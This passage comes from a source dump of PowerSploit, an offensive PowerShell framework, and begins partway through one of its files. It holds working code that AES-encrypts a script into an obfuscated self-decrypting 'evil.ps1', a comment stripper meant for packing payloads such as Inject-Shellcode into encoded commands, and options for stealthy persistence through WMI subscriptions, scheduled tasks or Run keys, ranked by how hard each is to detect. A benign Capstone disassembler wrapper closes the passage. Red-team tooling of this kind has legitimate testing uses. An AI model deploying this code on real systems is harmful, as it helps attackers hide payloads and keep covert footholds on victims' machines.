While this can be used to encrypt any file, it's primarily designed to encrypt itself. 83 | [Byte[]] $scriptBytes = Get-Content -Encoding byte -Path $ScriptPath 84 | $DerivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($Password, $AsciiEncoder.GetBytes($Salt), "SHA1", 2) 85 | $Key = New-Object System.Security.Cryptography.RijndaelManaged 86 | $Key.Mode = [System.Security.Cryptography.CipherMode]::CBC 87 | [Byte[]] $KeyBytes = $DerivedPass.GetBytes(32) 88 | $Encryptor = $Key.CreateEncryptor($KeyBytes, $ivBytes) 89 | $MemStream = New-Object System.IO.MemoryStream 90 | $CryptoStream = New-Object System.Security.Cryptography.CryptoStream($MemStream, $Encryptor, [System.Security.Cryptography.CryptoStreamMode]::Write) 91 | $CryptoStream.Write($scriptBytes, 0, $scriptBytes.Length) 92 | $CryptoStream.FlushFinalBlock() 93 | $CipherTextBytes = $MemStream.ToArray() 94 | $MemStream.Close() 95 | $CryptoStream.Close() 96 | $Key.Clear() 97 | $Cipher = [Convert]::ToBase64String($CipherTextBytes) 98 | 99 | # Generate encrypted PS1 file. All that will be included is the base64-encoded ciphertext and a slightly 'obfuscated' decrypt function 100 | $Output = 'function de([String] $b, [String] $c) 101 | { 102 | $a = "' 103 | $Output += $cipher 104 | $Output += '"' 105 | $Output += '; 106 | $encoding = New-Object System.Text.ASCIIEncoding; 107 | $dd = $encoding.GetBytes("CRACKMEIFYOUCAN!"); 108 | $aa = [Convert]::FromBase64String($a); 109 | $derivedPass = New-Object System.Security.Cryptography.PasswordDeriveBytes($b, $encoding.GetBytes($c), "SHA1", 2); 110 | [Byte[]] $e = $derivedPass.GetBytes(32); 111 | $f = New-Object System.Security.Cryptography.RijndaelManaged; 112 | $f.Mode = [System.Security.Cryptography.CipherMode]::CBC; 113 | [Byte[]] $h = New-Object Byte[]($aa.Length); 114 | $g = $f.CreateDecryptor($e, $dd); 115 | $i = New-Object System.IO.MemoryStream($aa, $True); 116 | $j = New-Object System.Security.Cryptography.CryptoStream($i, $g, [System.Security.Cryptography.CryptoStreamMode]::Read); 117 | $r = $j.Read($h, 0, $h.Length); 118 | $i.Close(); 119 | $j.Close(); 120 | $f.Clear(); 121 | return $encoding.GetString($h,0,$h.Length); 122 | }' 123 | 124 | # Output decrypt function and ciphertext to evil.ps1 125 | Out-File -InputObject $Output -Encoding ASCII $FilePath 126 | 127 | Write-Verbose "Encrypted PS1 file saved to: $(Resolve-Path $FilePath)" 128 | 129 | } 130 | -------------------------------------------------------------------------------- /ScriptModification/Remove-Comments.ps1: -------------------------------------------------------------------------------- 1 | function Remove-Comments 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Strips comments and extra whitespace from a script. 7 | 8 | PowerSploit Function: Remove-Comments 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | Remove-Comments strips out comments and unnecessary whitespace from a script. This is best used in conjunction with Out-EncodedCommand when the size of the script to be encoded might be too big. 17 | 18 | A major portion of this code was taken from the Lee Holmes' Show-ColorizedContent script. You rock, Lee! 19 | 20 | .PARAMETER ScriptBlock 21 | 22 | Specifies a scriptblock containing your script. 23 | 24 | .PARAMETER Path 25 | 26 | Specifies the path to your script. 27 | 28 | .EXAMPLE 29 | 30 | C:\PS> $Stripped = Remove-Comments -Path .\ScriptWithComments.ps1 31 | 32 | .EXAMPLE 33 | 34 | C:\PS> Remove-Comments -ScriptBlock { 35 | ### This is my awesome script. My documentation is beyond reproach! 36 | Write-Host 'Hello, World!' ### Write 'Hello, World' to the host 37 | ### End script awesomeness 38 | } 39 | 40 | Write-Host 'Hello, World!' 41 | 42 | .EXAMPLE 43 | 44 | C:\PS> Remove-Comments -Path Inject-Shellcode.ps1 | Out-EncodedCommand 45 | 46 | Description 47 | ----------- 48 | Removes extraneous whitespace and comments from Inject-Shellcode (which is notoriously large) and pipes the output to Out-EncodedCommand. 49 | 50 | .INPUTS 51 | 52 | System.String, System.Management.Automation.ScriptBlock 53 | 54 | Accepts either a string containing the path to a script or a scriptblock. 55 | 56 | .OUTPUTS 57 | 58 | System.Management.Automation.ScriptBlock 59 | 60 | Remove-Comments returns a scriptblock. Call the ToString method to convert a scriptblock to a string, if desired. 61 | 62 | .LINK 63 | 64 | http://www.exploit-monday.com 65 | http://www.leeholmes.com/blog/2007/11/07/syntax-highlighting-in-powershell/ 66 | #> 67 | 68 | [CmdletBinding( DefaultParameterSetName = 'FilePath' )] Param ( 69 | [Parameter(Position = 0, Mandatory = $True, ParameterSetName = 'FilePath' )] 70 | [ValidateNotNullOrEmpty()] 71 | [String] 72 | $Path, 73 | 74 | [Parameter(Position = 0, ValueFromPipeline = $True, Mandatory = $True, ParameterSetName = 'ScriptBlock' )] 75 | [ValidateNotNullOrEmpty()] 76 | [ScriptBlock] 77 | $ScriptBlock 78 | ) 79 | 80 | Set-StrictMode -Version 2 81 | 82 | if ($PSBoundParameters['Path']) 83 | { 84 | Get-ChildItem $Path -ErrorAction Stop | Out-Null 85 | $ScriptBlockString = [IO.File]::ReadAllText((Resolve-Path $Path)) 86 | $ScriptBlock = [ScriptBlock]::Create($ScriptBlockString) 87 | } 88 | else 89 | { 90 | # Convert the scriptblock to a string so that it can be referenced with array notation 91 | $ScriptBlockString = $ScriptBlock.ToString() 92 | } 93 | 94 | # Tokenize the scriptblock and return all tokens except for comments 95 | $Tokens = [System.Management.Automation.PSParser]::Tokenize($ScriptBlock, [Ref] $Null) | Where-Object { $_.Type -ne 'Comment' } 96 | 97 | $StringBuilder = New-Object Text.StringBuilder 98 | 99 | # The majority of the remaining code comes from Lee Holmes' Show-ColorizedContent script. 100 | $CurrentColumn = 1 101 | $NewlineCount = 0 102 | foreach($CurrentToken in $Tokens) 103 | { 104 | # Now output the token 105 | if(($CurrentToken.Type -eq 'NewLine') -or ($CurrentToken.Type -eq 'LineContinuation')) 106 | { 107 | $CurrentColumn = 1 108 | # Only insert a single newline. Sequential newlines are ignored in order to save space. 109 | if ($NewlineCount -eq 0) 110 | { 111 | $StringBuilder.AppendLine() | Out-Null 112 | } 113 | $NewlineCount++ 114 | } 115 | else 116 | { 117 | $NewlineCount = 0 118 | 119 | # Do any indenting 120 | if($CurrentColumn -lt $CurrentToken.StartColumn) 121 | { 122 | # Insert a single space in between tokens on the same line. Extraneous whiltespace is ignored. 123 | if ($CurrentColumn -ne 1) 124 | { 125 | $StringBuilder.Append(' ') | Out-Null 126 | } 127 | } 128 | 129 | # See where the token ends 130 | $CurrentTokenEnd = $CurrentToken.Start + $CurrentToken.Length - 1 131 | 132 | # Handle the line numbering for multi-line strings 133 | if(($CurrentToken.Type -eq 'String') -and ($CurrentToken.EndLine -gt $CurrentToken.StartLine)) 134 | { 135 | $LineCounter = $CurrentToken.StartLine 136 | $StringLines = $(-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd] -split '`r`n') 137 | 138 | foreach($StringLine in $StringLines) 139 | { 140 | $StringBuilder.Append($StringLine) | Out-Null 141 | $LineCounter++ 142 | } 143 | } 144 | # Write out a regular token 145 | else 146 | { 147 | $StringBuilder.Append((-join $ScriptBlockString[$CurrentToken.Start..$CurrentTokenEnd])) | Out-Null 148 | } 149 | 150 | # Update our position in the column 151 | $CurrentColumn = $CurrentToken.EndColumn 152 | } 153 | } 154 | 155 | Write-Output ([ScriptBlock]::Create($StringBuilder.ToString())) 156 | } 157 | -------------------------------------------------------------------------------- /Persistence/New-ElevatedPersistenceOptions.ps1: -------------------------------------------------------------------------------- 1 | function New-ElevatedPersistenceOptions 2 | { 3 | <# 4 | .SYNOPSIS 5 | 6 | Configure elevated persistence options for the Add-Persistence function. 7 | 8 | PowerSploit Function: New-ElevatedPersistenceOptions 9 | Author: Matthew Graeber (@mattifestation) 10 | License: BSD 3-Clause 11 | Required Dependencies: None 12 | Optional Dependencies: None 13 | 14 | .DESCRIPTION 15 | 16 | New-ElevatedPersistenceOptions allows for the configuration of elevated persistence options. The output of this function is a required parameter of Add-Persistence. Available persitence options in order of stealth are the following: permanent WMI subscription, scheduled task, and registry. 17 | 18 | .PARAMETER PermanentWMI 19 | 20 | Persist via a permanent WMI event subscription. This option will be the most difficult to detect and remove. 21 | 22 | Detection Difficulty: Difficult 23 | Removal Difficulty: Difficult 24 | User Detectable? No 25 | 26 | .PARAMETER ScheduledTask 27 | 28 | Persist via a scheduled task. 29 | 30 | Detection Difficulty: Moderate 31 | Removal Difficulty: Moderate 32 | User Detectable? No 33 | 34 | .PARAMETER Registry 35 | 36 | Persist via the HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run registry key. Note: This option will briefly pop up a PowerShell console to the user. 37 | 38 | Detection Difficulty: Easy 39 | Removal Difficulty: Easy 40 | User Detectable? Yes 41 | 42 | .PARAMETER AtLogon 43 | 44 | Starts the payload upon any user logon. 45 | 46 | .PARAMETER AtStartup 47 | 48 | Starts the payload within 240 and 325 seconds of computer startup. 49 | 50 | .PARAMETER OnIdle 51 | 52 | Starts the payload after one minute of idling. 53 | 54 | .PARAMETER Daily 55 | 56 | Starts the payload daily. 57 | 58 | .PARAMETER At 59 | 60 | Starts the payload at the specified time. You may specify times in the following formats: '12:31 AM', '2 AM', '23:00:00', or '4:06:26 PM'. 61 | 62 | .EXAMPLE 63 | 64 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -PermanentWMI -Daily -At '3 PM' 65 | 66 | .EXAMPLE 67 | 68 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -Registry -AtStartup 69 | 70 | .EXAMPLE 71 | 72 | C:\PS> $ElevatedOptions = New-ElevatedPersistenceOptions -ScheduledTask -OnIdle 73 | 74 | .LINK 75 | 76 | http://www.exploit-monday.com 77 | #> 78 | 79 | [CmdletBinding()] Param ( 80 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 81 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 82 | [Switch] 83 | $PermanentWMI, 84 | 85 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 86 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 87 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 88 | [Switch] 89 | $ScheduledTask, 90 | 91 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 92 | [Switch] 93 | $Registry, 94 | 95 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 96 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 97 | [Switch] 98 | $Daily, 99 | 100 | [Parameter( ParameterSetName = 'PermanentWMIDaily', Mandatory = $True )] 101 | [Parameter( ParameterSetName = 'ScheduledTaskDaily', Mandatory = $True )] 102 | [DateTime] 103 | $At, 104 | 105 | [Parameter( ParameterSetName = 'ScheduledTaskOnIdle', Mandatory = $True )] 106 | [Switch] 107 | $OnIdle, 108 | 109 | [Parameter( ParameterSetName = 'ScheduledTaskAtLogon', Mandatory = $True )] 110 | [Parameter( ParameterSetName = 'Registry', Mandatory = $True )] 111 | [Switch] 112 | $AtLogon, 113 | 114 | [Parameter( ParameterSetName = 'PermanentWMIAtStartup', Mandatory = $True )] 115 | [Switch] 116 | $AtStartup 117 | ) 118 | 119 | $PersistenceOptionsTable = @{ 120 | Method = '' 121 | Trigger = '' 122 | Time = '' 123 | } 124 | 125 | switch ($PSCmdlet.ParameterSetName) 126 | { 127 | 'PermanentWMIAtStartup' 128 | { 129 | $PersistenceOptionsTable['Method'] = 'PermanentWMI' 130 | $PersistenceOptionsTable['Trigger'] = 'AtStartup' 131 | } 132 | 133 | 'PermanentWMIDaily' 134 | { 135 | $PersistenceOptionsTable['Method'] = 'PermanentWMI' 136 | $PersistenceOptionsTable['Trigger'] = 'Daily' 137 | $PersistenceOptionsTable['Time'] = $At 138 | } 139 | 140 | 'ScheduledTaskAtLogon' 141 | { 142 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 143 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 144 | } 145 | 146 | 'ScheduledTaskOnIdle' 147 | { 148 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 149 | $PersistenceOptionsTable['Trigger'] = 'OnIdle' 150 | } 151 | 152 | 'ScheduledTaskDaily' 153 | { 154 | $PersistenceOptionsTable['Method'] = 'ScheduledTask' 155 | $PersistenceOptionsTable['Trigger'] = 'Daily' 156 | $PersistenceOptionsTable['Time'] = $At 157 | } 158 | 159 | 'Registry' 160 | { 161 | $PersistenceOptionsTable['Method'] = 'Registry' 162 | $PersistenceOptionsTable['Trigger'] = 'AtLogon' 163 | } 164 | } 165 | 166 | $PersistenceOptions = New-Object -TypeName PSObject -Property $PersistenceOptionsTable 167 | $PersistenceOptions.PSObject.TypeNames[0] = 'PowerSploit.Persistence.ElevatedPersistenceOptions' 168 | 169 | Write-Output $PersistenceOptions 170 | } 171 | -------------------------------------------------------------------------------- /Capstone/Capstone.psm1: -------------------------------------------------------------------------------- 1 | #Requires -Modules Capstone 2 | 3 | function Get-CSDisassembly 4 | { 5 | <# 6 | .SYNOPSIS 7 | 8 | Disassembles a byte array using the Capstone Engine disassembly framework. 9 | 10 | PowerSploit Function: Get-CSDisassembly 11 | Author: Matthew Graeber (@mattifestation) 12 | License: See LICENSE.TXT 13 | Required Dependencies: lib\capstone.dll, lib\[x86|x64]\libcapstone.dll 14 | Optional Dependencies: None 15 | 16 | .DESCRIPTION 17 | 18 | Get-CSDisassembly is compatible on 32 and 64-bit. 19 | 20 | .PARAMETER Architecture 21 | 22 | Specifies the architecture of the code to be disassembled. 23 | 24 | .PARAMETER Mode 25 | 26 | Specifies the mode in which to disassemble code. For example, to disassemble Amd64 code, architecture is set to 'X86' and Mode is set to 'MODE_64'. 27 | 28 | .PARAMETER Code 29 | 30 | A byte array consisting of the code to be disassembled. 31 | 32 | .PARAMETER Offset 33 | 34 | Specifies the starting address of the disassembly listing. 35 | 36 | .PARAMETER Count 37 | 38 | Specifies the maximum number of instructions to disassemble. 39 | 40 | .PARAMETER Syntax 41 | 42 | Specifies the syntax flavor to be used (INTEL vs. ATT). 43 | 44 | .PARAMETER DetailOn 45 | 46 | Specifies that detailed parsing should be performed - i.e. provide detailed information for each disassembled instruction. 47 | 48 | .PARAMETER Verstion 49 | 50 | Prints the running Capstone Framework version. 51 | 52 | .EXAMPLE 53 | 54 | $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) 55 | Get-CSDisassembly -Architecture X86 -Mode Mode16 -Code $Bytes -Offset 0x1000 56 | 57 | $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) 58 | Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes 59 | 60 | $Bytes = [Byte[]] @( 0x8D, 0x4C, 0x32, 0x08, 0x01, 0xD8, 0x81, 0xC6, 0x34, 0x12, 0x00, 0x00 ) 61 | Get-CSDisassembly -Architecture X86 -Mode Mode32 -Code $Bytes -Syntax ATT 62 | 63 | $Bytes = [Byte[]] @( 0x55, 0x48, 0x8b, 0x05, 0xb8, 0x13, 0x00, 0x00 ) 64 | Get-CSDisassembly -Architecture X86 -Mode Mode64 -Code $Bytes -DetailOn 65 | 66 | $Bytes = [Byte[]] @( 0xED, 0xFF, 0xFF, 0xEB, 0x04, 0xe0, 0x2d, 0xe5, 0x00, 0x00, 0x00, 0x00, 0xe0, 0x83, 0x22, 0xe5, 0xf1, 0x02, 0x03, 0x0e, 0x00, 0x00, 0xa0, 0xe3, 0x02, 0x30, 0xc1, 0xe7, 0x00, 0x00, 0x53, 0xe3 ) 67 | Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes 68 | 69 | $Bytes = [Byte[]] @( 0x4f, 0xf0, 0x00, 0x01, 0xbd, 0xe8, 0x00, 0x88, 0xd1, 0xe8, 0x00, 0xf0 ) 70 | Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes 71 | 72 | $Bytes = [Byte[]] @( 0x10, 0xf1, 0x10, 0xe7, 0x11, 0xf2, 0x31, 0xe7, 0xdc, 0xa1, 0x2e, 0xf3, 0xe8, 0x4e, 0x62, 0xf3 ) 73 | Get-CSDisassembly -Architecture Arm -Mode Arm -Code $Bytes 74 | 75 | $Bytes = [Byte[]] @( 0x70, 0x47, 0xeb, 0x46, 0x83, 0xb0, 0xc9, 0x68 ) 76 | Get-CSDisassembly -Architecture Arm -Mode Thumb -Code $Bytes -DetailOn 77 | 78 | $Bytes = [Byte[]] @( 0x21, 0x7c, 0x02, 0x9b, 0x21, 0x7c, 0x00, 0x53, 0x00, 0x40, 0x21, 0x4b, 0xe1, 0x0b, 0x40, 0xb9 ) 79 | Get-CSDisassembly -Architecture Arm64 -Mode Arm -Code $Bytes 80 | 81 | $Bytes = [Byte[]] @( 0x0C, 0x10, 0x00, 0x97, 0x00, 0x00, 0x00, 0x00, 0x24, 0x02, 0x00, 0x0c, 0x8f, 0xa2, 0x00, 0x00, 0x34, 0x21, 0x34, 0x56 ) 82 | Get-CSDisassembly -Architecture Mips -Mode 'Mode32, BigEndian' -Code $Bytes 83 | 84 | $Bytes = [Byte[]] @( 0x56, 0x34, 0x21, 0x34, 0xc2, 0x17, 0x01, 0x00 ) 85 | Get-CSDisassembly -Architecture Mips -Mode 'Mode64, LittleEndian' -Code $Bytes 86 | 87 | $Bytes = [Byte[]] @( 0x80, 0x20, 0x00, 0x00, 0x80, 0x3f, 0x00, 0x00, 0x10, 0x43, 0x23, 0x0e, 0xd0, 0x44, 0x00, 0x80, 0x4c, 0x43, 0x22, 0x02, 0x2d, 0x03, 0x00, 0x80, 0x7c, 0x43, 0x20, 0x14, 0x7c, 0x43, 0x20, 0x93, 0x4f, 0x20, 0x00, 0x21, 0x4c, 0xc8, 0x00, 0x21 ) 88 | Get-CSDisassembly -Architecture PPC -Mode BigEndian -Code $Bytes 89 | 90 | .INPUTS 91 | 92 | None 93 | 94 | You cannot pipe objects to Get-CSDisassembly. 95 | 96 | .OUTPUTS 97 | 98 | Capstone.Instruction[] 99 | 100 | Get-CSDisassembly returns an array of Instruction objects. 101 | #> 102 | 103 | [OutputType([Capstone.Instruction])] 104 | [CmdletBinding(DefaultParameterSetName = 'Disassemble')] 105 | Param ( 106 | [Parameter(Mandatory, ParameterSetName = 'Disassemble')] 107 | [Capstone.Architecture] 108 | $Architecture, 109 | 110 | [Parameter(Mandatory, ParameterSetName = 'Disassemble')] 111 | [Capstone.Mode] 112 | $Mode, 113 | 114 | [Parameter(Mandatory, ParameterSetName = 'Disassemble')] 115 | [ValidateNotNullOrEmpty()] 116 | [Byte[]] 117 | $Code, 118 | 119 | [Parameter( ParameterSetName = 'Disassemble' )] 120 | [UInt64] 121 | $Offset = 0, 122 | 123 | [Parameter( ParameterSetName = 'Disassemble' )] 124 | [UInt32] 125 | $Count = 0, 126 | 127 | [Parameter( ParameterSetName = 'Disassemble' )] 128 | [ValidateSet('Intel', 'ATT')] 129 | [String] 130 | $Syntax, 131 | 132 | [Parameter( ParameterSetName = 'Disassemble' )] 133 | [Switch] 134 | $DetailOn, 135 | 136 | [Parameter( ParameterSetName = 'Version' )] 137 | [Switch] 138 | $Version 139 | ) 140 | 141 | if ($PsCmdlet.ParameterSetName -eq 'Version') 142 | { 143 | $Disassembly = New-Object Capstone.Capstone([Capstone.Architecture]::X86, [Capstone.Mode]::Mode16) 144 | $Disassembly.Version 145 | 146 | return 147 | } 148 | 149 | $Disassembly = New-Object Capstone.Capstone($Architecture, $Mode) 150 | 151 | if ($Disassembly.Version -ne [Capstone.Capstone]::BindingVersion) 152 | { 153 | Write-Error "capstone.dll version ($([Capstone.Capstone]::BindingVersion.ToString())) should be the same as libcapstone.dll version. Otherwise, undefined behavior is likely." 154 | } 155 | 156 | if ($Syntax) 157 | { 158 | switch ($Syntax) 159 | { 160 | 'Intel' { $SyntaxMode = [Capstone.OptionValue]::SyntaxIntel } 161 | 'ATT' { $SyntaxMode = [Capstone.OptionValue]::SyntaxATT } 162 | } 163 | 164 | $Disassembly.SetSyntax($SyntaxMode) 165 | } 166 | 167 | if ($DetailOn) 168 | { 169 | $Disassembly.SetDetail($True) 170 | } 171 | 172 | $Disassembly.Disassemble($Code, $Offset, $Count) 173 | } --------------------------------------------------------------------------------